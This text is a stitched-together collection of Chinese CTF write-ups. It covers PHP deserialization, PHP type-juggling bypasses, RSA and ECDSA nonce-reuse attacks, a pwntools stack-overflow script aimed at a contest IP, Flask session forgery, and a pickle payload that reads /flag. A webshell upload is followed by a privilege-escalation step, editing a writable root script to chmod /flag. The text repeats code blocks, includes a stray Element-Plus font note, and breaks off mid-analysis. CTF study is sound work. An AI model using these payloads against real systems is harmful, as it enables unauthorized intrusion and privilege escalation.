echo "Hello, " . htmlspecialchars($this->username) . "!";
}
}
}
if (isset($_GET['data'])) {
$data = $_GET['data'];
$object = unserialize($data);
if ($object instanceof User) {
echo $object;
} else {
echo "Invalid object!";
}
} else {
highlight_file(__FILE__);
}
?>
我们需要构造一个 User 对象,并将 isAdmin 设置为 true,以便在反序列化时触发 __wakeup() 方法并执行 getFlag() 来读取 flag。
<?php
class Flag {
private $flag;
public function __construct() {
$this->flag = file_get_contents('/flag');
}
public function getFlag() {
return $this->flag;
}
public function __toString() {
return "You can't directly access the flag!";
}
}
class User {
public $username;
public $isAdmin = false;
public function __construct($username) {
$this->username = $username;
}
public function __wakeup() {
if ($this->isAdmin) {
echo "Welcome, admin! Here's your flag: " . (new Flag())->getFlag();
} else {
echo "Hello, " . htmlspecialchars($this->username) . "!";
}
}
}
$payload = new User("attacker");
$payload->isAdmin = true;
$data = serialize($payload);
echo urlencode($data);
?>
运行后拿到 URL 编码的序列化字符串,这个字符串就是我们要传递的 data 参数。
O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A8%3A%22attacker%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3B%7D
然后就可以拿到 flag 了。
]]>import libnum
import gmpy2
from Crypto.Util.number import *
flag=b'ISCTF{********}'
m=bytes_to_long(flag)
p=libnum.generate_prime(1024)
q=libnum.generate_prime(1024)
n=p*q
e=0x10001
c=pow(m,e,n)
d=inverse(e,(p-1)*(q-1))
leak = (d+(pow(p,q,n)+pow(q,p,n)))%n
print("c=", c)
print("n=", n)
print("leak=", leak)
"""
c= 8989289659072309605793417141528767265266446236550650613514493589798432446586991233583435051268377555448062724563967695425657559568596372723980081067589103919296476501677424322525079257328042851349095575718347302884996529329066703597604694781627113384086536158793653551546025090807063130353950841148535682974762381044510423210397947080397718080033363000599995100765708244828566873128882878164321817156170983773105693537799111546309755235573342169431295776881832991533489235535981382958295960435126843833532716436804949502318851112378495533302256759494573250596802016112398817816155228378089079806308296705261876583997
n= 13424018200035368603483071894166480724482952594135293395398366121467209427078817227870501294732149372214083432516059795712917132804111155585926502759533393295089100965059106772393520277313184519450478832376508528256865861027444446718552169503579478134286009893965458507369983396982525906466073384013443851551139147777507283791250268462136554061959016630318688169168797939873600493494258467352326974238472394214986505312411729432927489878418792288365594455065912126527908319239444514857325441614280498882524432151918146061570116187524918358453036228204087993064505391742062288050068745930452767100091519798860487150247
leak= 9192002086528025412361053058922669469031188193149143635074798633855112230489479254740324032262690315813650428270911079121913869290893574897752990491429582640499542165616254566396564016734157323265631446079744216458719690853526969359930225042993006404843355356540487296896949431969541367144841985153231095140361069256753593550199420993461786814074270171257117410848796614931926182811404655619662690700351986753661502438299236428991412206196135090756862851230228396476709412020941670878645924203989895008014836619321109848938770269989596541278600166088022166386213646074764712810133558692545401032391239330088256431881
"""
import libnum
import gmpy2
from Crypto.Util.number import *
flag=b'ISCTF{********}'
m=bytes_to_long(flag)
p=libnum.generate_prime(1024)
q=libnum.generate_prime(1024)
n=p*q
e=0x10001
c=pow(m,e,n)
d=inverse(e,(p-1)*(q-1))
leak = (d+(pow(p,q,n)+pow(q,p,n)))%n
print("c=", c)
print("n=", n)
print("leak=", leak)
"""
c= 8989289659072309605793417141528767265266446236550650613514493589798432446586991233583435051268377555448062724563967695425657559568596372723980081067589103919296476501677424322525079257328042851349095575718347302884996529329066703597604694781627113384086536158793653551546025090807063130353950841148535682974762381044510423210397947080397718080033363000599995100765708244828566873128882878164321817156170983773105693537799111546309755235573342169431295776881832991533489235535981382958295960435126843833532716436804949502318851112378495533302256759494573250596802016112398817816155228378089079806308296705261876583997
n= 13424018200035368603483071894166480724482952594135293395398366121467209427078817227870501294732149372214083432516059795712917132804111155585926502759533393295089100965059106772393520277313184519450478832376508528256865861027444446718552169503579478134286009893965458507369983396982525906466073384013443851551139147777507283791250268462136554061959016630318688169168797939873600493494258467352326974238472394214986505312411729432927489878418792288365594455065912126527908319239444514857325441614280498882524432151918146061570116187524918358453036228204087993064505391742062288050068745930452767100091519798860487150247
leak= 9192002086528025412361053058922669469031188193149143635074798633855112230489479254740324032262690315813650428270911079121913869290893574897752990491429582640499542165616254566396564016734157323265631446079744216458719690853526969359930225042993006404843355356540487296896949431969541367144841985153231095140361069256753593550199420993461786814074270171257117410848796614931926182811404655619662690700351986753661502438299236428991412206196135090756862851230228396476709412020941670878645924203989895008014836619321109848938770269989596541278600166088022166386213646074764712810133558692545401032391239330088256431881
"""
编写一个 Payload 用于解决这道题。
from Crypto.Util.number import long_to_bytes
c = 8989289659072309605793417141528767265266446236550650613514493589798432446586991233583435051268377555448062724563967695425657559568596372723980081067589103919296476501677424322525079257328042851349095575718347302884996529329066703597604694781627113384086536158793653551546025090807063130353950841148535682974762381044510423210397947080397718080033363000599995100765708244828566873128882878164321817156170983773105693537799111546309755235573342169431295776881832991533489235535981382958295960435126843833532716436804949502318851112378495533302256759494573250596802016112398817816155228378089079806308296705261876583997
n = 13424018200035368603483071894166480724482952594135293395398366121467209427078817227870501294732149372214083432516059795712917132804111155585926502759533393295089100965059106772393520277313184519450478832376508528256865861027444446718552169503579478134286009893965458507369983396982525906466073384013443851551139147777507283791250268462136554061959016630318688169168797939873600493494258467352326974238472394214986505312411729432927489878418792288365594455065912126527908319239444514857325441614280498882524432151918146061570116187524918358453036228204087993064505391742062288050068745930452767100091519798860487150247
leak = 9192002086528025412361053058922669469031188193149143635074798633855112230489479254740324032262690315813650428270911079121913869290893574897752990491429582640499542165616254566396564016734157323265631446079744216458719690853526969359930225042993006404843355356540487296896949431969541367144841985153231095140361069256753593550199420993461786814074270171257117410848796614931926182811404655619662690700351986753661502438299236428991412206196135090756862851230228396476709412020941670878645924203989895008014836619321109848938770269989596541278600166088022166386213646074764712810133558692545401032391239330088256431881
m = pow(c, leak-n-1, n)
print(long_to_bytes(m))
int __fastcall main(int argc, const char **argv, const char **envp)
{
_BYTE buf[40]; // [rsp+0h] [rbp-30h] BYREF
char s1[8]; // [rsp+28h] [rbp-8h] BYREF
init(argc, argv, envp);
puts("welcome to isctf2024");
puts("first i need your team id");
read(0, buf, 0x30uLL);
if ( strcmp(s1, "admin") )
{
puts("no no no");
exit(0);
}
puts("ok, go on");
vuln();
return 0;
}
int __fastcall main(int argc, const char **argv, const char **envp)
{
_BYTE buf[40]; // [rsp+0h] [rbp-30h] BYREF
char s1[8]; // [rsp+28h] [rbp-8h] BYREF
init(argc, argv, envp);
puts("welcome to isctf2024");
puts("first i need your team id");
read(0, buf, 0x30uLL);
if ( strcmp(s1, "admin") )
{
puts("no no no");
exit(0);
}
puts("ok, go on");
vuln();
return 0;
}
遵循着有事先溢出的原则,buf可以储存 40 个字节。我们需要运行vuln()函数,编写以下 Payload 来绕过strcmp(s1, "admin")
payload = b'a' * 40 + b'admin'
connection.send(payload)
继续分析文件,发现可以溢出到0x000000000040121E这个位置来执行 Shell
我们再来看一眼vuln()代码:
__int64 vuln()
{
__int64 result; // rax
__int64 i; // [rsp+28h] [rbp-8h]
for ( i = 0LL; i <= 7; ++i )
{
printf("please input your %d girlfriend birthday\n", i + 1);
result = __isoc99_scanf("%ld");
}
return result;
}
0x000000000040121E对应的十进制为4198932
通过栈溢出实现执行 Shell,编写 Payload 脚本实现,以下是完整的 Payload 脚本。
from pwn import *
connection = remote('27.25.151.12', 31274)
payload = b'a' * 40 + b'admin'
connection.send(payload)
response_sequence = [b'1', b'1', b'3', b'3', b'4', b'5', b'6', b'4198942']
for response in response_sequence:
connection.recvuntil(b'birthday')
connection.sendline(response)
connection.interactive()
<?php
error_reporting(0);
highlight_file(__FILE__);
$a = "isctf2024";
$b = $_GET["b"];
@parse_str($b);
echo "小蓝鲨开始闯关,你能帮助他拿到flag吗?<br>";
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
$num = $_POST["num"];
echo "第一关有惊无险!小蓝鲨壮着胆子接着继续往下走!<br>";
if($num == 2024){
die("QAQ小蓝鲨误入陷阱,不怕,再接再厉!");
}
if(preg_match("/[a-z]/i", $num)){
die("陷阱太多QAQ");
}
if(intval($num,0) == 2024){
echo "到这了难道还要放弃吗?<br>";
if (isset($_GET['which'])){
$which = $_GET['which'];
echo "小蓝鲨貌似在哪里见过这个陷阱O.o?继续加油,还差最后一步了!";
switch ($which){
case 0:
print('QAQ');
case 1:
case 2:
require_once $which.'.php';
echo $flag;
break;
default:
echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false);
break;
}
}
}
}
<?php
error_reporting(0);
highlight_file(__FILE__);
$a = "isctf2024";
$b = $_GET["b"];
@parse_str($b);
echo "小蓝鲨开始闯关,你能帮助他拿到flag吗?<br>";
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
$num = $_POST["num"];
echo "第一关有惊无险!小蓝鲨壮着胆子接着继续往下走!<br>";
if($num == 2024){
die("QAQ小蓝鲨误入陷阱,不怕,再接再厉!");
}
if(preg_match("/[a-z]/i", $num)){
die("陷阱太多QAQ");
}
if(intval($num,0) == 2024){
echo "到这了难道还要放弃吗?<br>";
if (isset($_GET['which'])){
$which = $_GET['which'];
echo "小蓝鲨貌似在哪里见过这个陷阱O.o?继续加油,还差最后一步了!";
switch ($which){
case 0:
print('QAQ');
case 1:
case 2:
require_once $which.'.php';
echo $flag;
break;
default:
echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false);
break;
}
}
}
}
如果$a[0] != 'QNKCDZO'而且md5($a[0]) == md5('QNKCDZO')则成立。该部分运用到 PHP 的特性。
md5 的碰撞,在 PHP 的数的处理中,0 开头的字符串会被转换成 0,所以才会有 md5 碰撞。 [[MD5-collision]]
所以只要传入 MD5 值为0e开头的字符串,且不等于题目中的字符串,则条件成立。
$a[0]取$a的第一个元素,如果传入字符串,则将会取第一个字母。所以我们需要传入一个数组。parse_str用于解析$b并将里面的东西转为变量,而@将会忽略转换的错误。如果 $b 的值是 "foo=bar&baz=qux",那么执行 parse_str($b); 后,PHP 将创建两个新的变量 $foo 和 $baz,它们的值分别是 "bar" 和 "qux"。
示例:
?b=a[0]=s878926199a
PHP 中post请求参数num, 有以下要求:
$num 不能等于数字 2024。$num 不能包含任何字母(无论是小写还是大写。intval($num, 0) 转换 $num 为整数时,结果等于 2024。尝试传入八进制数字03750,可以通过校验。
要使用八进制表达,数字前必须加上
0(零)。 PHP 8.1.0 起,八进制表达也可以在前面加上0o或者0O。 要使用十六进制表达,数字前必须加上0x。要使用二进制表达,数字前必须加上0b。 [[PHP Hypertext Preprocessor]]
if (isset($_GET['which'])) {
$which = $_GET['which'];
echo "小蓝鲨貌似在哪里见过这个陷阱O.o?继续加油,还差最后一步了!";
switch ($which) {
case 0:
print('QAQ');
case 1:
case 2:
require_once $which . '.php';
echo $flag;
break;
default:
echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false);
break;
}
}
PHP 转换的规则的是:若字符串以数字开头,则取开头数字作为转换结果,若无则输出 0。 具体请查阅: php 里,为什么 0 == 'abc'是成立的? - SegmentFault 思否
尝试传入flag字符串返回了 flag.
可以从中提取出迷宫的字符串。
可以从中提取出迷宫的字符串。
根据这里可以判断字符串是一个(31*30)-1的一个矩形。
大概是这种构造。
我们需要编写算法,使得从 P 点触发,不经过 C 直接到达 E(如果到达 C 点会触发彩蛋)
import hashlib
import numpy as np
from queue import Queue
from heapq import heappush, heappop
maze_str = """
###############################P#...............#...#.......#.#####.###.#####.#.###.#####.#.....#...#.#.....#...#.#...#.#####.#.###.#.#######.#.#.###.#C..#.#.#...#.#...#...#.#.#...#.#.#.#.#.###.#.#.#.###.#.#.#.#.#.#.#.#...#...#.#.......#.#.#.###.#.###.#####.#########.###.#...#...#.....#.#.......#...#.#.#####.#####.#.#.#####.###.#...#...#...#...#...#...#.#...#.###.#.###.#.#######.#.#.#.#.#...#.#.#...#.#...#...#...#.#.###.#.#.#####.#.#.#.#######.###.#...#.....#...#.#.#...#.....#.#########.#####.#.###.#.###.#.#.....#.#...#...#...#...#.#.#.#.#.#.#.###.#.#####.###.#.#.#...#.#...#.#...#...#...#...#.#.###.###.#.#####.#.###.###.#.#...#.#.#.......#.#...#.#...#.#####.#.#######.#.#####.#.###.#...#.#.......#.#...#...#.#..E#.#.#.#.#######.###.#.#####.#.#.#...#.............#.....#.#.#.###############.#######.#.#.#.........#...#...#.....#...#.#.#######.#.#.#####.#.#######.#.......#...#.......#.........
"""
maze_str = '\n'.join([maze_str[i:i+31] for i in range(1, len(maze_str), 30)])
print(maze_str)
# Split the maze string into lines and remove empty lines
maze_lines = [line for line in maze_str.strip().split('\n') if line]
# Get dimensions
height = len(maze_lines)
width = len(maze_lines[0])
# Create numpy array
maze = np.zeros((height, width), dtype=int)
# Fill array and find special points
start = None
checkpoint = None
end = None
for i, line in enumerate(maze_lines):
for j, char in enumerate(line):
if char == '#':
maze[i, j] = 1
elif char == 'P':
start = (i, j)
elif char == 'C':
checkpoint = (i, j)
elif char == 'E':
end = (i, j)
print("Maze array created with shape:", maze.shape)
print("Start position (P):", start)
print("Checkpoint position (C):", checkpoint)
print("End position (E):", end)
def get_direct_path(maze, start, end):
rows, cols = maze.shape
visited = set()
q = Queue()
q.put((start, [])) # (position, path)
directions = [(-1, 0), (1, 0), (0, -1), (0, 1)]
direction_names = ['上', '下', '左', '右']
while not q.empty():
(i, j), path = q.get()
if (i, j) == end:
print("找到直接路径!")
print("路径步骤:", ' '.join(path))
print("总步数:", len(path))
direction_map = {'上': 'l', '下': 'o', '左': 'v', '右': 'e'}
path_new = [direction_map[d] for d in path]
print("路径(使用love):", ''.join(path_new))
print("MD5:", hashlib.md5(''.join(path_new).encode()).hexdigest())
return path
if (i, j) in visited:
continue
visited.add((i, j))
for idx, (di, dj) in enumerate(directions):
ni, nj = i + di, j + dj
if (0 <= ni < rows and 0 <= nj < cols and
maze[ni, nj] != 1 and (ni, nj) not in visited and
(ni, nj) != checkpoint):
q.put(((ni, nj), path + [direction_names[idx]]))
print("未找到不经过检查点的路径")
return None
direct_path = get_direct_path(maze, start, end)
将最优路线的 MD5 提交即可。
]]>from PIL import Image
from Crypto.Util.number import bytes_to_long, long_to_bytes
import numpy as np
n = 29869349657224745144762606999
e = 65537
original_image_path = "flag.jpg"
img = Image.open(original_image_path)
img = img.convert("RGB")
img_array = np.array(img)
h, w, _ = img_array.shape
encrypted_array = np.zeros((h, w, 3), dtype=object)
for i in range(h):
for j in range(w):
r, g, b = int(img_array[i, j, 0]), int(img_array[i, j, 1]), int(img_array[i, j, 2])
encrypted_array[i, j, 0] = pow(r, e, n)
encrypted_array[i, j, 1] = pow(g, e, n)
encrypted_array[i, j, 2] = pow(b, e, n)
np.save("encrypted_image.npy", encrypted_array)
print("图片已加密并保存为 encrypted_image.npy")
from PIL import Image
from Crypto.Util.number import bytes_to_long, long_to_bytes
import numpy as np
n = 29869349657224745144762606999
e = 65537
original_image_path = "flag.jpg"
img = Image.open(original_image_path)
img = img.convert("RGB")
img_array = np.array(img)
h, w, _ = img_array.shape
encrypted_array = np.zeros((h, w, 3), dtype=object)
for i in range(h):
for j in range(w):
r, g, b = int(img_array[i, j, 0]), int(img_array[i, j, 1]), int(img_array[i, j, 2])
encrypted_array[i, j, 0] = pow(r, e, n)
encrypted_array[i, j, 1] = pow(g, e, n)
encrypted_array[i, j, 2] = pow(b, e, n)
np.save("encrypted_image.npy", encrypted_array)
print("图片已加密并保存为 encrypted_image.npy")
pip install pillow pycryptodome numpy sympy
这段代码使用 RSA 加密算法对图片的每个像素进行加密,并将加密后的数据保存为一个 NumPy 数组文件。
既然是 RSA,那么就需要分解n。所幸,这个n非常的短。
n = 29869349657224745144762606999
e = 65537
那么我们可以直接将p和q给分解出来。
factors = list(sympy.factorint(n).keys())
p, q = factors[0], factors[1]
既然得到了p和q,我们可以把φ(n)求出来。
phi_n = (p - 1) * (q - 1)
然后计算得到私钥d.
d = pow(e, -1, phi_n)
我们读取 Numpy 数组,逆向加密代码将各个像素点解密。
encrypted_array = np.load("encrypted_image.npy", allow_pickle=True)
h, w, _ = encrypted_array.shape
decrypted_array = np.zeros((h, w, 3), dtype=np.uint8)
for i in range(h):
for j in range(w):
r, g, b = int(encrypted_array[i, j, 0]), int(encrypted_array[i, j, 1]), int(encrypted_array[i, j, 2])
decrypted_array[i, j, 0] = pow(r, d, n)
decrypted_array[i, j, 1] = pow(g, d, n)
decrypted_array[i, j, 2] = pow(b, d, n)
然后将所有的数组转为图片并保存。
decrypted_img = Image.fromarray(decrypted_array, 'RGB')
decrypted_img.save("decrypted_flag.jpg")
from PIL import Image
import numpy as np
import sympy
n = 29869349657224745144762606999
e = 65537
factors = list(sympy.factorint(n).keys())
p, q = factors[0], factors[1]
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
encrypted_array = np.load("encrypted_image.npy", allow_pickle=True)
h, w, _ = encrypted_array.shape
decrypted_array = np.zeros((h, w, 3), dtype=np.uint8)
for i in range(h):
for j in range(w):
r, g, b = int(encrypted_array[i, j, 0]), int(encrypted_array[i, j, 1]), int(encrypted_array[i, j, 2])
decrypted_array[i, j, 0] = pow(r, d, n)
decrypted_array[i, j, 1] = pow(g, d, n)
decrypted_array[i, j, 2] = pow(b, d, n)
decrypted_img = Image.fromarray(decrypted_array, 'RGB')
decrypted_img.save("decrypted_flag.jpg")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
username = request.form.get('username')
password = request.form.get('password')
if username == 'test' and password == 'test111':
session['username'] = username
session['password'] = password
session['status'] = 'user'
return redirect('/news')
else:
session['login_error'] = True
return render_template("login.html")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
username = request.form.get('username')
password = request.form.get('password')
if username == 'test' and password == 'test111':
session['username'] = username
session['password'] = password
session['status'] = 'user'
return redirect('/news')
else:
session['login_error'] = True
return render_template("login.html")
@app.route('/admin', methods=['GET', 'POST'])
def admin():
if session.get('status') != 'admin' or session.get('username') != 'admin' or session.get('password') != 'admin222':
return redirect("/login")
news = newslist.news_list
return render_template("admin.html", news=news)
当用户名是test密码是test111则可以登录,但是当用户名是admin密码为admin222时才能登录管理员面板,这就摆明了要求我们绕过验证。
app.config["SECRET_KEY"] = "W3l1com_isCTF"
这里提供了SECRET_KEY,我们可以根据这个加解密 session.
我使用的noraj/flask-session-cookie-manager: 🍪 Flask Session Cookie Decoder/Encoder工具解析的 session,相关的使用方法可以在 Github 查看。
python -m flask_session_cookie_manager3 encode -s "W3l1com_isCTF" -t "{'password': 'admin222', 'status': 'admin', 'username': 'admin'}"
.eJyrVipILC4uzy9KUbJSSkzJzcwzMjJS0lEqLkksKS2GiQEFSotTi_ISc1PhQrUAUyMTvw.ZzXjYw.JGCK95W6Ukxa7bFuD7ji1Uq68PA
将 Cookies 中 session 换成生成的 session 即可进入管理员平台。
然后继续分析代码。
news_data = base64.b64decode(serialized_news)
在这里会将 base64 字符串解码。
black_list = ['create_news', 'export_news', 'add_news', 'get_news']
在这里有一个黑名单,出现这里面提到的单词会被 ban 掉。其实这是一个线索,我们可以想象一下如何使用这里面的东西而不被发现~~(base64:不管我事哈)~
newslist = NewsList()
代码在这里将对象实例化,可以直接调用。
newslist.create_news(6, open("/flag").read())
编写这样一段 Payload,然后转为 base64.
bmV3c2xpc3QuY3JlYXRlX25ld3MoNiwgb3BlbigiL2ZsYWciKS5yZWFkKCkp
[pickle
]]>
尝试上传一句话木马,可以上传。
尝试上传一句话木马,可以上传。
尝试使用蚁剑链接,发现可以连接。
在根目录找到 flag,但是权限不够打不开。
当我寻找其他方案时,它竟然把我的脚本删了!!!!!!
到底是哪个玩意干的??到底是谁??是谁呢??
一定是它了,在根目录有个down_file.sh是可以编辑的。就是它把我的 PHP 删了!!!
既然你不仁,休怪我不义!!
chmod 0777 /flag
body设置,而是使用 Element-Plus 配置文件中的默认项。
// Typography
$font-family: () !default;
$font-family: map.merge(
(
// default family
"":
"'Helvetica Neue', Helvetica, 'PingFang SC', 'Hiragino Sans GB', 'Microsoft YaHei', '微软雅黑', Arial, sans-serif"
),
$font-family
);
body设置,而是使用 Element-Plus 配置文件中的默认项。
// Typography
$font-family: () !default;
$font-family: map.merge(
(
// default family
"":
"'Helvetica Neue', Helvetica, 'PingFang SC', 'Hiragino Sans GB', 'Microsoft YaHei', '微软雅黑', Arial, sans-serif"
),
$font-family
);
它的字体在配置文件是写死的,而且官方并没有提供办法修改。如果修改mode_modules,推送到流水线后并不会同步,只能用其他方法。
import gmpy2
import random
import binascii
from hashlib import sha256
from sympy import nextprime
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Util.number import long_to_bytes
from FLAG import flag
#flag = 'wdflag{123}'
def victory_encrypt(plaintext, key):
key = key.upper()
key_length = len(key)
plaintext = plaintext.upper()
ciphertext = ''
for i, char in enumerate(plaintext):
if char.isalpha():
shift = ord(key[i % key_length]) - ord('A')
encrypted_char = chr((ord(char) - ord('A') + shift) % 26 + ord('A'))
ciphertext += encrypted_char
else:
ciphertext += char
return ciphertext
victory_key = "WANGDINGCUP"
victory_encrypted_flag = victory_encrypt(flag, victory_key)
p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
a = 0
b = 7
xG = 0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798
yG = 0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8
G = (xG, yG)
n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
h = 1
zero = (0,0)
dA = nextprime(random.randint(0, n))
if dA > n:
print("warning!!")
def addition(t1, t2):
if t1 == zero:
return t2
if t2 == zero:
return t2
(m1, n1) = t1
(m2, n2) = t2
if m1 == m2:
if n1 == 0 or n1 != n2:
return zero
else:
k = (3 * m1 * m1 + a) % p * gmpy2.invert(2 * n1 , p) % p
else:
k = (n2 - n1 + p) % p * gmpy2.invert((m2 - m1 + p) % p, p) % p
m3 = (k * k % p - m1 - m2 + p * 2) % p
n3 = (k * (m1 - m3) % p - n1 + p) % p
return (int(m3),int(n3))
def multiplication(x, k):
ans = zero
t = 1
while(t <= k):
if (k &t )>0:
ans = addition(ans, x)
x = addition(x, x)
t <<= 1
return ans
def getrs(z, k):
(xp, yp) = P
r = xp
s = (z + r * dA % n) % n * gmpy2.invert(k, n) % n
return r,s
z1 = random.randint(0, p)
z2 = random.randint(0, p)
k = random.randint(0, n)
P = multiplication(G, k)
hA = multiplication(G, dA)
r1, s1 = getrs(z1, k)
r2, s2 = getrs(z2, k)
print("r1 = {}".format(r1))
print("r2 = {}".format(r2))
print("s1 = {}".format(s1))
print("s2 = {}".format(s2))
print("z1 = {}".format(z1))
print("z2 = {}".format(z2))
key = sha256(long_to_bytes(dA)).digest()
cipher = AES.new(key, AES.MODE_CBC)
iv = cipher.iv
encrypted_flag = cipher.encrypt(pad(victory_encrypted_flag.encode(), AES.block_size))
encrypted_flag_hex = binascii.hexlify(iv + encrypted_flag).decode('utf-8')
print("Encrypted flag (AES in CBC mode, hex):", encrypted_flag_hex)
# output
# r1 = 86806104739558095745988469033305523200538774705708894815836887970976487278764
# r2 = 86806104739558095745988469033305523200538774705708894815836887970976487278764
# s1 = 93400851884262731807098055393482657423555590196362184363643455285862566867372
# s2 = 58741027521216057788923508334695668250013849866589902683641825341545919891746
# z1 = 47591695289461307212638536234394543297527537576682980326526736956079807805586
# z2 = 97911075901954715147720917205165523174582665086645698292621371632896283314804
# ('Encrypted flag (AES in CBC mode, hex):', u'86cd24e2914c0c4d9b87bea34005a98bd8587d14cae71909b917679d3328304e7915e6ba4cad1096faa4a85bc52f8056d3f21ef09516be8a5160f1b338a6b936')
import gmpy2
import random
import binascii
from hashlib import sha256
from sympy import nextprime
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Util.number import long_to_bytes
from FLAG import flag
#flag = 'wdflag{123}'
def victory_encrypt(plaintext, key):
key = key.upper()
key_length = len(key)
plaintext = plaintext.upper()
ciphertext = ''
for i, char in enumerate(plaintext):
if char.isalpha():
shift = ord(key[i % key_length]) - ord('A')
encrypted_char = chr((ord(char) - ord('A') + shift) % 26 + ord('A'))
ciphertext += encrypted_char
else:
ciphertext += char
return ciphertext
victory_key = "WANGDINGCUP"
victory_encrypted_flag = victory_encrypt(flag, victory_key)
p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
a = 0
b = 7
xG = 0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798
yG = 0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8
G = (xG, yG)
n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
h = 1
zero = (0,0)
dA = nextprime(random.randint(0, n))
if dA > n:
print("warning!!")
def addition(t1, t2):
if t1 == zero:
return t2
if t2 == zero:
return t2
(m1, n1) = t1
(m2, n2) = t2
if m1 == m2:
if n1 == 0 or n1 != n2:
return zero
else:
k = (3 * m1 * m1 + a) % p * gmpy2.invert(2 * n1 , p) % p
else:
k = (n2 - n1 + p) % p * gmpy2.invert((m2 - m1 + p) % p, p) % p
m3 = (k * k % p - m1 - m2 + p * 2) % p
n3 = (k * (m1 - m3) % p - n1 + p) % p
return (int(m3),int(n3))
def multiplication(x, k):
ans = zero
t = 1
while(t <= k):
if (k &t )>0:
ans = addition(ans, x)
x = addition(x, x)
t <<= 1
return ans
def getrs(z, k):
(xp, yp) = P
r = xp
s = (z + r * dA % n) % n * gmpy2.invert(k, n) % n
return r,s
z1 = random.randint(0, p)
z2 = random.randint(0, p)
k = random.randint(0, n)
P = multiplication(G, k)
hA = multiplication(G, dA)
r1, s1 = getrs(z1, k)
r2, s2 = getrs(z2, k)
print("r1 = {}".format(r1))
print("r2 = {}".format(r2))
print("s1 = {}".format(s1))
print("s2 = {}".format(s2))
print("z1 = {}".format(z1))
print("z2 = {}".format(z2))
key = sha256(long_to_bytes(dA)).digest()
cipher = AES.new(key, AES.MODE_CBC)
iv = cipher.iv
encrypted_flag = cipher.encrypt(pad(victory_encrypted_flag.encode(), AES.block_size))
encrypted_flag_hex = binascii.hexlify(iv + encrypted_flag).decode('utf-8')
print("Encrypted flag (AES in CBC mode, hex):", encrypted_flag_hex)
# output
# r1 = 86806104739558095745988469033305523200538774705708894815836887970976487278764
# r2 = 86806104739558095745988469033305523200538774705708894815836887970976487278764
# s1 = 93400851884262731807098055393482657423555590196362184363643455285862566867372
# s2 = 58741027521216057788923508334695668250013849866589902683641825341545919891746
# z1 = 47591695289461307212638536234394543297527537576682980326526736956079807805586
# z2 = 97911075901954715147720917205165523174582665086645698292621371632896283314804
# ('Encrypted flag (AES in CBC mode, hex):', u'86cd24e2914c0c4d9b87bea34005a98bd8587d14cae71909b917679d3328304e7915e6ba4cad1096faa4a85bc52f8056d3f21ef09516be8a5160f1b338a6b936')
# 创建虚拟环境,防止污染本机环境
python3 -m venv venv
source ./venv/bin/activate
# pip安装运行库
pip install gmpy2 sympy pycryptodome
key = sha256(long_to_bytes(dA)).digest()
cipher = AES.new(key, AES.MODE_CBC)
iv = cipher.iv
encrypted_flag = cipher.encrypt(pad(victory_encrypted_flag.encode(), AES.block_size))
encrypted_flag_hex = binascii.hexlify(iv + encrypted_flag).decode('utf-8')
题目提供给我们的是encrypted_flag_hex,我们要获取flag,需要先得到encrypted_flag.
encrypted_flag_hex = u'86cd24e2914c0c4d9b87bea34005a98bd8587d14cae71909b917679d3328304e7915e6ba4cad1096faa4a85bc52f8056d3f21ef09516be8a5160f1b338a6b936'
encrypted_flag_bytes = binascii.unhexlify(encrypted_flag_hex)
iv = encrypted_flag_bytes[:AES.block_size]
encrypted_flag = encrypted_flag_bytes[AES.block_size:]
我们需要获得victory_encrypted_flag的值,也就需要:
key = sha256(long_to_bytes(dA)).digest()
cipher = AES.new(key, AES.MODE_CBC, iv)
victory_encrypted_flag = unpad(cipher.decrypt(encrypted_flag), AES.block_size).decode('utf-8')
这里需要dA的值,而dA在这里定义:
dA = nextprime(random.randint(0, n))
首先生成一个在 0 到 n 之间的随机整数,然后找到大于这个随机整数的下一个质数,并将其赋值给变量dA. 如果要求得dA,就要求得k的值。
k值先看看原函数如何包装 k 值:
首先,生成范围为(0, n)的随机整数k.
n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
k = random.randint(0, n)
然后生成范围为(0, p)的随机整数z1, z2.
p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
z1 = random.randint(0, p)
z2 = random.randint(0, p)
z1, z2均已给出输出值。
然后将k, z1, z2分别传入getrs()函数。并输出r1, s1, r2, s2.
r1, s1 = getrs(z1, k)
r2, s2 = getrs(z2, k)
现在已经明白了 k 是如何被一步步包装成六个变量的,可以根据代码逐步的逆向运算得到k值。
首先,r1, s1, r2, s2指向了一个getrs()函数,我们可以分析一下这个函数。
def getrs(z, k):
(xp, yp) = P
r = xp
s = (z + r * dA % n) % n * gmpy2.invert(k, n) % n
return r,s
此函数的(xp, yp) = P指向了P = multiplication(G, k).我们可以分析一下multiplication()函数。
def multiplication(x, k):
ans = zero
t = 1
while(t <= k):
if (k &t )>0:
ans = addition(ans, x)
x = addition(x, x)
t <<= 1
return ans
这个函数的某些变量指向了addition()函数,我们继续看一下这段函数。
def addition(t1, t2):
if t1 == zero:
return t2
if t2 == zero:
return t2
(m1, n1) = t1
(m2, n2) = t2
if m1 == m2:
if n1 == 0 or n1 != n2:
return zero
else:
k = (3 * m1 * m1 + a) % p * gmpy2.invert(2 * n1 , p) % p
else:
